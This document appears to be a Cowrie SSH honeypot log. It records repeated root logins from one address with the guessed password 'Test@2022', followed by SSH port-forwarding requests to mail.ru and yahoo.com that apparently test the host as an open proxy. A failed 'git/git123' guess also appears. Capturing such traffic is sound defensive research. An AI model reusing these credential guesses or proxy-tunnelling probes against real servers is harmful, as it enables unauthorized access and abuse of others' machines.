{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.655746Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.706249Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.956889Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9877,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9877","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.008265Z","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.058776Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":23902,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23902","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.200923Z","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.251231Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":21379,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21379","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.392673Z","session":"df9ea3cbea79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.442956Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.494150Z","src_ip":"77.83.207.83","session":"df9ea3cbea79"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6118,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff864047b4a","protocol":"ssh","message":"New connection: 77.83.207.83:6118 (1.2.3.4:22) [session: eff864047b4a]","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.544411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.545084Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.596432Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.757159Z","src_ip":"212.227.235.229","session":"a8da4328bd7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.852425Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22713,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22713","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.904447Z","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:54.955714Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":17753,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17753","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.101559Z","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.152750Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":14112,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14112","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.297531Z","session":"eff864047b4a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.348700Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.401028Z","src_ip":"77.83.207.83","session":"eff864047b4a"}
{"eventid":"cowrie.session.closed","duration":"82.8","message":"Connection lost after 82.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.447242Z","src_ip":"212.227.125.160","session":"3a579c9a3040"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6222,"dst_ip":"1.2.3.4","dst_port":22,"session":"f534c313acf7","protocol":"ssh","message":"New connection: 77.83.207.83:6222 (1.2.3.4:22) [session: f534c313acf7]","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.450271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.450939Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.501723Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.752276Z","src_ip":"212.227.235.229","session":"bd5f49b6856c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.753384Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28890,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28890","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.804612Z","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.855680Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":23692,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:23692","sensor":"my-vps","timestamp":"2025-08-31T03:48:55.996618Z","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.047160Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":27615,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27615","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.188930Z","session":"f534c313acf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.239488Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.290534Z","src_ip":"77.83.207.83","session":"f534c313acf7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6327,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbcb2e2acc7e","protocol":"ssh","message":"New connection: 77.83.207.83:6327 (1.2.3.4:22) [session: cbcb2e2acc7e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.339106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.339989Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.390027Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.638062Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12495,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12495","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.688685Z","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.738564Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6384,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6384","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.880039Z","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:56.929971Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":18378,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18378","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.072114Z","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.122532Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.173090Z","src_ip":"77.83.207.83","session":"cbcb2e2acc7e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6444,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed9abd8da76f","protocol":"ssh","message":"New connection: 77.83.207.83:6444 (1.2.3.4:22) [session: ed9abd8da76f]","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.222767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.233064Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.273418Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.524709Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12565,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12565","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.575616Z","session":"ed9abd8da76f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.626812Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23009,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23009","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.768743Z","session":"ed9abd8da76f"}
